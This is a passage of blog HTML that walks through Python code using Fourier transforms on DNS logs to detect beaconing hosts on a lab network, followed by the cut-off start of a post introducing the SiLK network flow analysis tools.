0.0002777777777777778</span></pre></div></div><div><br /></div></div><div>Get the frequency axis</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">frequency_axis = np.fft.fftfreq(n=N, d=frequency_rate)</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">frequency_axis, len(frequency_axis)
(array([ 0., 2., 4., ..., -6., -4., -2.]), 1800)
</span></pre><div><br /></div></div></div><div><br /></div></div><div><div>With the frequency axis in place, let's plot the frequency axis on its own for now. Notice the Y axis is both positive and negative. Notice it goes from 0 to 1800 which is half of 3600 which is basically half our sampling period. Also notice it goes from 0 to -1800. Did you see the symmetry?</div></div><br /><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="color: white;">plt.title('Plot showing both frequency in both negative and positive values')
plt.plot(frequency_axis, lw=3, c='r')
plt.ylabel('amplitude')
plt.xlabel('count of samples');</span></div></pre><div><br /></div></div></div><div><br /></div></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir-40vjWwAO8rPWhiLqrydwV6y8wY4cSiKMIH-vaNj8NE9B6LJHMeqsc0FZGV_hLkf-Y_tH4cD1RiLN3sW9tsG9xY7-er2ju6MLc_iKZNC7pjYKOWEdsFl-xWYf7i6Gk61BzGCRJOyCo28eSn2f2iYdNIL0atmHg4CzFQK6f-2HCyWrXTW7xLtid_ockY/s616/frequency%20half-way.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="455" data-original-width="616" height="474" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEir-40vjWwAO8rPWhiLqrydwV6y8wY4cSiKMIH-vaNj8NE9B6LJHMeqsc0FZGV_hLkf-Y_tH4cD1RiLN3sW9tsG9xY7-er2ju6MLc_iKZNC7pjYKOWEdsFl-xWYf7i6Gk61BzGCRJOyCo28eSn2f2iYdNIL0atmHg4CzFQK6f-2HCyWrXTW7xLtid_ockY/w640-h474/frequency%20half-way.png" width="640" /></a></div><br /><div>Looking at the symmetry from another way. With the frequency axis in place, let's plot the frequency axis on its own for now. Notice the Y axis is both positive and negative. Notice it goes from 0 to 1800 which is half of 3600 which is basically half our sampling period. Also notice it goes from 0 to -1800.</div><div><div>You should be able to see the symmetry now? Basically same as you saw above. Just from a different perspective</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">norm_amplitude = np.abs(fourier)/normalize</span></div><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">plt.title('Plot showing symmetry of frequencies')
plt.plot(frequency_axis, norm_amplitude)
plt.ylabel('amplitude')
plt.xlabel('Frequencies')</span></div></pre></div></div></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs4y74xDcGgBr4BCUCfWhFTtrcu6gG8o40zxjkg_HiL41-s7LPQ_MXzws4b1rvWfRxx2e1fBGjBbcim8usIptD0s5DcNxc7gCkwvXIyioy4jZfPNzmE9qgEKdvuTjGD_S3IX6gcbtfrJ8RjF41lLyoF2Ih1FDVxyagShevU3QcP29GZdXpPRQETvzODQY/s554/frequency%20symmetry.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="455" data-original-width="554" height="526" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs4y74xDcGgBr4BCUCfWhFTtrcu6gG8o40zxjkg_HiL41-s7LPQ_MXzws4b1rvWfRxx2e1fBGjBbcim8usIptD0s5DcNxc7gCkwvXIyioy4jZfPNzmE9qgEKdvuTjGD_S3IX6gcbtfrJ8RjF41lLyoF2Ih1FDVxyagShevU3QcP29GZdXpPRQETvzODQY/w640-h526/frequency%20symmetry.png" width="640" /></a></div><div>Just print the length and frequency values as a refresher for me</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">N, frequency_rate</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">
(1800, 0.0002777777777777778)</span></pre></div></div></div><div><br /></div><div>Just getting a better understanding of the lengths</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">len(np.fft.rfft(x)), len(2*np.abs(np.fft.rfft(x))), len(np.abs(np.fft.rfft(x))), N</span></div><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111;"><span style="color: white;">
(901, 901, 901, 1800)</span></span></div></pre></div></div></div><div><br /></div><div>Finalize this code</div><div><br /></div><div>We see that we have also gotten rid of the symmetry and now only have the positive half on the line</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">plt.plot(np.fft.rfftfreq(n=N, d=frequency_rate), 2*np.abs(np.fft.rfft(x))/N)</span></div></pre></div></div></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8Oe7n1MLu_lyyNNGmAcP2a9KR0VzSZf3MXRYef5MBjw7Ud83k7lPAJ9yQZUIYOVTPOH2xTk9K4W6DOB2dhrBnj9Iy92zWvzzvOO30Fdxu5IvyH6nqGvGxcG9daSq9QnYTsmwjorhYeQQ47O6Xw7z-MUwy0PeVW17d6SrfXdqv06RlHV78baOiFdqoy-E/s534/frequency%20symmetry%20broken.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="413" data-original-width="534" height="494" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8Oe7n1MLu_lyyNNGmAcP2a9KR0VzSZf3MXRYef5MBjw7Ud83k7lPAJ9yQZUIYOVTPOH2xTk9K4W6DOB2dhrBnj9Iy92zWvzzvOO30Fdxu5IvyH6nqGvGxcG9daSq9QnYTsmwjorhYeQQ47O6Xw7z-MUwy0PeVW17d6SrfXdqv06RlHV78baOiFdqoy-E/w640-h494/frequency%20symmetry%20broken.png" width="640" /></a></div><div><br /></div><div><div>Compute the FFT values returned for the counts per second</div></div><div>Use the sampling period of 3600</div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">fft = abs(np.fft.rfft(counts_per_period))
dvalue = int(best_period.rstrip("s"))
frequencies = np.fft.rfftfreq(n=len(counts_per_period), d=dvalue/sampling_period)
# Print the first 10 entries
frequencies[:10]
array([0., 1., 2., 3., 4., 5., 6., 7., 8., 9.])
</span></div><div><br /></div></pre></div></div></div><div><br /></div></div><div><div>Get any signal spikes over CONST * stdev over the rest of the noise. This will be the interesting stuff to look at. The amplitudes (y-values) come from the FFT array found above.</div><div><br /></div><div>Find the standard deviation of the remaining data, so we can use it to find the strongest signals present. </div><div>Strip off the first 10% of the frequencies found, which will remove the DC component of the signal, leaving you with just the actual signal spikes.</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><br /></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">print(f'Max frequency: {max(frequencies)}')
print(f'10% of the max frequency value: {0.1*max(frequencies)}')
print(f'Here are the frequencies - the lower 10%: \n\t {frequencies[frequencies > 0.1*max(frequencies)][:10]}')
Max frequency: 900.0
10% of the max frequency value: 90.0
Here are the frequencies - the lower 10%:
[ 91. 92. 93. 94. 95. 96. 97. 98. 99. 100.]</span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><br /></pre></div></div></div><div><br /></div></div><div><div>With the above being made clear, save these new frequencies to a variable</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">stripped_frequencies = frequencies[ frequencies > 0.1 * max(frequencies) ]</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">
# Print the first 10 entries
stripped_frequencies[:10]
array([ 91., 92., 93., 94., 95., 96., 97., 98., 99., 100.])</span></pre></div></div></div><div><br /></div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">print(f'[*] Size of stripped frequencies: {stripped_frequencies.size}')</span></div><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111;"><span style="color: white;">print(f'[*] Length of the fft transformed data: {len(fft)}')
print(f'[*] New FFT: {fft[len(fft) - stripped_frequencies.size:][:10]}')
[*] Size of stripped frequencies: 810
[*] Length of the fft transformed data: 901
[*] New FFT: [1143.47208739 473.94896724 304.70114392 420.31706819 219.34075832
581.26586592 572.50777759 136.43847641 1108.424958 1136.18872268]</span></span></div></pre></div></div></div><div><br /></div></div><div><div>Get the stripped FFT. Print the first 10 entries</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">stripped_fft = fft[len(fft) - stripped_frequencies.size:]</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">
stripped_fft[:10]
array([1143.47208739, 473.94896724, 304.70114392, 420.31706819,
219.34075832, 581.26586592, 572.50777759, 136.43847641,
1108.424958 , 1136.18872268])</span></pre></div></div><div><br /></div></div><div><div>Leverage descriptive statistics. Get the standard deviation</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">std_dev = np.std(stripped_fft)</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">
# Get the mean
mean = np.mean(stripped_fft)
# Set a threshold
threshold = mean + 2*std_dev
print(f'Standard Deviation: {std_dev} | Mean: {mean} | Threshold: {threshold}')
<br /></span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">
Standard Deviation: 240.6914745391128 | Mean: 369.67931016529883 | Threshold: 851.0622592435244</span></pre></div></div></div><div><br /></div></div><div>Add the strong signals to a list</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">1./sampling_period</span></div><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;"><br /></span></div><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">strong_signals = []
for signal in stripped_fft:
if (signal > threshold):
# print(f"adding signal: {str(signal)}")
strong_signals.append(signal)
# Print the first 10 entries
strong_signals[:10]
[1143.4720873935075,
1108.4249580037538,
1136.188722679384,
978.1350685678566,
1309.8618870200787,
1265.7223903589352,
1214.0629560494137,
1747.6746509763254,
1440.277194109987,
1079.5542043630226]</span></div></pre></div></div></div><div><br /></div><div>Plot the frequency data after removing the DC component</div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">fig = px.line(</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;"> x=stripped_frequencies,
y=(abs(stripped_fft)),
labels=dict(x="Frequency (cycle/sec)", y="Connection Information"),
title="Connection Information by Frequency With DC Removed; Sampling Period: " + best_period
)
fig.show()</span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><br /></pre></div></div></div><div><br /></div></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUubMhklB4as8zWQaG-CMya5_03NVQkS8bO0NJOVeP0U1cvEuhKWaGt3LlqAigBfk6c4OXzpxCVXCL_73PxlEjnU0fOo2SO-S1YLtHreGKLguXBPYhtctFsKPiepY3Ju3rd8x_3qyjJRilssSG-0-pTHy4zN5dx6D8DhZxB-Gdg2gaA2NMGhn_k-7tgdg/s1138/Fourier%20-%20DC%20offset%20removed.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="450" data-original-width="1138" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUubMhklB4as8zWQaG-CMya5_03NVQkS8bO0NJOVeP0U1cvEuhKWaGt3LlqAigBfk6c4OXzpxCVXCL_73PxlEjnU0fOo2SO-S1YLtHreGKLguXBPYhtctFsKPiepY3Ju3rd8x_3qyjJRilssSG-0-pTHy4zN5dx6D8DhZxB-Gdg2gaA2NMGhn_k-7tgdg/w640-h253/Fourier%20-%20DC%20offset%20removed.png" width="640" /></a></div><div>For each strong signal: find the array index from the FFT array</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">signal_indices = []</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">i = 0
while (i < len(strong_signals)):
matching_index = np.where(fft == np.float64(strong_signals[i]))[0][0]
#print(f'Matching Index: {matching_index}')
signal_indices.append(matching_index)
i += 1
signal_indices[:10]
[91, 99, 100, 103, 104, 105, 106, 107, 108, 109]</span></pre></div></div><div><br /></div></div><div><div>Create a new array of the same size as the FFT array. Zero it out, except for the indices you just found, which are the strong signals we want to find the times for.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">strong_signal_frequencies = np.zeros(len(fft))</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">for index in signal_indices:
strong_signal_frequencies[index] = frequencies[index]
strong_signal_amplitudes = np.zeros(len(fft))
for index in signal_indices:
strong_signal_amplitudes[index] = fft[index]</span></pre></div></div></div><div><br /></div><div><div>Graph the data in the time domain, by your 2 seconds sampling period. Clearly we can see below there spikes of interest</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">fig = px.line(</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;"> counts_per_period,
labels=dict(x="Timestamp", y="DNS Log Information"),
title="DNS By Timestamp; Sampling Period: " + best_period
)
fig.show()</span></pre></div></div></div><div><br /></div></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrJiz5PzNp0j7fKHLKJY1weCxTcBuSpece1BJWdvUXN8rQQmXW-6BV8bHgPlpLTjef0RVfAjbXazMT60XtA8wALFv7cq1DzKws4rM7Yj8mBuVswxwrb6wkMCohNuWWLIHGfqDsbsCFAO50dhs2U03k7S1EAgT09F1hmoWP5AhiQwPVzoXJXLDYmDeQGRU/s571/samples%20in%202%20seconds%20window.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="455" data-original-width="571" height="510" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrJiz5PzNp0j7fKHLKJY1weCxTcBuSpece1BJWdvUXN8rQQmXW-6BV8bHgPlpLTjef0RVfAjbXazMT60XtA8wALFv7cq1DzKws4rM7Yj8mBuVswxwrb6wkMCohNuWWLIHGfqDsbsCFAO50dhs2U03k7S1EAgT09F1hmoWP5AhiQwPVzoXJXLDYmDeQGRU/w640-h510/samples%20in%202%20seconds%20window.png" width="640" /></a></div><div><div><br /></div><div>De-noise the data by filtering. Make an effective bandpass filter by zeroing out all the frequencies except the strong ones found above. Plot just the strong signal frequencies vs their amplitudes.</div></div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIW9_a0CclunytW6JDmsa1NyK921vOEYxYnTNR_2B6IeXL1XVtR9NRWa3D2obYYgIzd65Xo4snDJgPv_NfN1uZiQC4NntCx81H5B2yxY_ghebccD1RKXluHNBqMnmPgdE0b_-IlqC622JguJfIlu3YitgE_rn4wwwbUtPKUDSN4C70ICxmb7oT7KEjQmM/s1138/samples%20in%202%20seconds%20window%20-%20noise%20removed.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="450" data-original-width="1138" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIW9_a0CclunytW6JDmsa1NyK921vOEYxYnTNR_2B6IeXL1XVtR9NRWa3D2obYYgIzd65Xo4snDJgPv_NfN1uZiQC4NntCx81H5B2yxY_ghebccD1RKXluHNBqMnmPgdE0b_-IlqC622JguJfIlu3YitgE_rn4wwwbUtPKUDSN4C70ICxmb7oT7KEjQmM/w640-h253/samples%20in%202%20seconds%20window%20-%20noise%20removed.png" width="640" /></a></div><div>Use the Inverse FFT to flip just the strong signals back to time-domain</div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">inverse_fft = np.fft.irfft(strong_signal_amplitudes, len(counts_per_period))</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">
fig = px.line(
x=counts_per_period.to_frame().index,
y=inverse_fft,
labels=dict(x="Timestamp", y="DNS Log"),
title="Periodic Signal"
)
fig.show()</span></pre></div></div></div><div><br /></div></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp_Tn8kwIA4FzvHx00rBbuGHs3H6-oXzpzpOluGsxq6LlLqrBVA8zesNddmUNQ3tgoLrv7rj2wxjRp-MeNOoiZjgaFJNhEajOGvA5aE3A4phaddFRQJ2h3fNVCQJcyQJLBQbLNIVvO1VoLxK0rLamCmyT0y5YDn5k5wPLP7tlnH4qPmHDHq0EbcsV0xWA/s1138/plot%20back%20in%20time%20domain.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="450" data-original-width="1138" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjp_Tn8kwIA4FzvHx00rBbuGHs3H6-oXzpzpOluGsxq6LlLqrBVA8zesNddmUNQ3tgoLrv7rj2wxjRp-MeNOoiZjgaFJNhEajOGvA5aE3A4phaddFRQJ2h3fNVCQJcyQJLBQbLNIVvO1VoLxK0rLamCmyT0y5YDn5k5wPLP7tlnH4qPmHDHq0EbcsV0xWA/w640-h253/plot%20back%20in%20time%20domain.png" width="640" /></a></div><div><div><br /></div><div>OK. Now, for each of our strong signals, we need to identify domains from our original data set that had a count of DNS requests "near" our signal strengths. (It won't be spot-on, due to sample frequency bin width and signal jitter.) This will be the shortlist of IP for further investigation.</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">shortlist = []</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">newdf = df_dns.groupby(['id.orig_h']).size().reset_index(name='counts')
for amplitude in strong_signals:
shortlist.append(newdf[ (newdf['counts'] > (amplitude*0.8)) & (newdf['counts'] < (amplitude*1.2)) ])
results = pd.concat(shortlist, ignore_index=True)
#print(results)
results[['id.orig_h','counts']]
id.orig_h counts
0 10.0.0.24 1927
1 10.0.0.9 1770</span></pre></div></div></div><div><br /></div></div><div><div>Just as we expected, this started off with us recognizing via <i>tcpdump </i>that the host at 10.0.0.9 is sending beacons every two seconds. Not only are we able to find that host but we also are seeing another host that is exhibiting similar behaviour. Let's now go back into our <i>Pandas DataFrame</i> and isolate traffic from these two hosts.</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><div style="background-color: #1e1e1e; line-height: 22px;"><span style="background-color: #111111; color: white;">df_dns[(df_dns['id.orig_h'] == '10.0.0.9') | (df_dns['id.orig_h'] == '10.0.0.24') ]</span></div></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">
ts id.orig_h id.orig_p id.resp_h query
21 2023-10-01 01:00:00 10.0.0.9 40520 10.0.0.2 somedomain.securitynik.local
28 2023-10-01 01:00:00 10.0.0.24 41626 10.0.0.2 assets-sncust.securitynik.com
29 2023-10-01 01:00:00 10.0.0.24 39327 10.0.0.2 assets-sncust.securitynik.com
35 2023-10-01 01:00:02 10.0.0.9 33415 10.0.0.2 somedomain.securitynik.local
37 2023-10-01 01:00:03 10.0.0.24 61312 10.0.0.2 s.update.3lift.com
... ... ... ... ... ...
8194 2023-10-01 01:59:45 10.0.0.24 5353 224.0.0.251 _googlecast._tcp.local
8209 2023-10-01 01:59:56 10.0.0.9 55148 10.0.0.2 somedomain.securitynik.local
8214 2023-10-01 01:59:58 10.0.0.9 40965 10.0.0.2 somedomain.securitynik.local
8215 2023-10-01 01:59:59 10.0.0.24 36625 10.0.0.2 i.ytimg.com
8216 2023-10-01 01:59:59 10.0.0.24 58969 10.0.0.2 youtubei.googleapis.com
3697 rows × 5 columns</span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><br /></pre></div></div></div><div><br /></div></div><div><div>At this point, we can convert this notebook to a python script that we can run in our environment.</div><div>See you in an upcoming <a href="https://www.sans.org/cyber-security-courses/applied-data-science-machine-learning/" target="_blank">SEC595: Applied Data Science and AI/Machine Learning for Cybersecurity Professionals</a></div><div>Also once again, big thanks to Joe Petroske for doing the initial heavy lifting.</div></div><div><br /></div><div><div>Some other helpful links/references</div><div><a href="https://realpython.com/python-scipy-fft/">https://realpython.com/python-scipy-fft/</a></div><div><a href="https://towardsdatascience.com/fourier-transform-the-practical-python-implementation-acdd32f1b96a">https://towardsdatascience.com/fourier-transform-the-practical-python-implementation-acdd32f1b96a</a></div><div><a href="https://pythonnumericalmethods.berkeley.edu/notebooks/chapter24.00-Fourier-Transforms.html">https://pythonnumericalmethods.berkeley.edu/notebooks/chapter24.00-Fourier-Transforms.html</a></div><div><br /></div><div><a href="https://ocw.mit.edu/courses/6-003-signals-and-systems-fall-2011/12e6e5d7567fca2e993ef8563fef5a60_MIT6_003F11_lec21.pdf">https://ocw.mit.edu/courses/6-003-signals-and-systems-fall-2011/12e6e5d7567fca2e993ef8563fef5a60_MIT6_003F11_lec21.pdf</a></div><div><a href="https://dsp.stackexchange.com/questions/30552/sampling-rate-vs-sampling-time-of-fft">https://dsp.stackexchange.com/questions/30552/sampling-rate-vs-sampling-time-of-fft</a></div><div><a href="https://electronics.stackexchange.com/questions/12407/what-is-the-relation-between-fft-length-and-frequency-resolution">https://electronics.stackexchange.com/questions/12407/what-is-the-relation-between-fft-length-and-frequency-resolution</a></div><div><a href="https://eeweb.engineering.nyu.edu/~yao/EE3054/Ch12.3_sampling.pdf">https://eeweb.engineering.nyu.edu/~yao/EE3054/Ch12.3_sampling.pdf</a></div><div><a href="https://www.eecs.umich.edu/courses/eecs206/archive/f02/public/lec/lect20.pdf">https://www.eecs.umich.edu/courses/eecs206/archive/f02/public/lec/lect20.pdf</a></div></div><div><br /></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-67301630351401015082023-10-02T10:20:00.005-07:002023-10-02T10:23:53.089-07:00Beginning SiLK - Systems for Internet Level Knowledge - working with network flow data<p>Silk is one of the tools used to analyze network flow data and something we teach in the <a href="https://www.sans.org/cyber-security-courses/network-monitoring-threat-detection/" target="_blank">SANS SEC503, Network Monitoring and Threat Detection</a>. In this post, I am walking through some of the tools within the SiLK suite, to show their basic and somewhat common usage. There is no specific order to their usage and at times, you may even see the same tool being used multiple times but in different ways.</p><p>Get SiLK version, compile information, etc. via <b><i>silk_config</i></b>.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><table><tbody><tr><td><pre style="line-height: 125%; margin: 0px;"> 1
2
3
4
5
6
7
8
9
10</pre></td><td><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">sans@sec503:~/nik$ </span><b><span style="color: #fcff01;">silk_config</span></b></span>
<span style="color: white;">silk-version: 3.19.2</span>
<span style="color: white;">compiler: gcc</span>
<span style="color: white;">cflags: -I/usr/local/include -DNDEBUG -D_ALL_SOURCE=1 -D_GNU_SOURCE=1 -I/usr/local/include -I/usr/include/glib-2.0 -I/usr/lib/x86_64-linux-gnu/glib-2.0/include -fno-strict-aliasing -O3</span>
<span style="color: white;">include: -I/usr/local/include -DNDEBUG -D_ALL_SOURCE=1 -D_GNU_SOURCE=1 -I/usr/local/include -I/usr/include/glib-2.0 -I/usr/lib/x86_64-linux-gnu/glib-2.0/include</span>
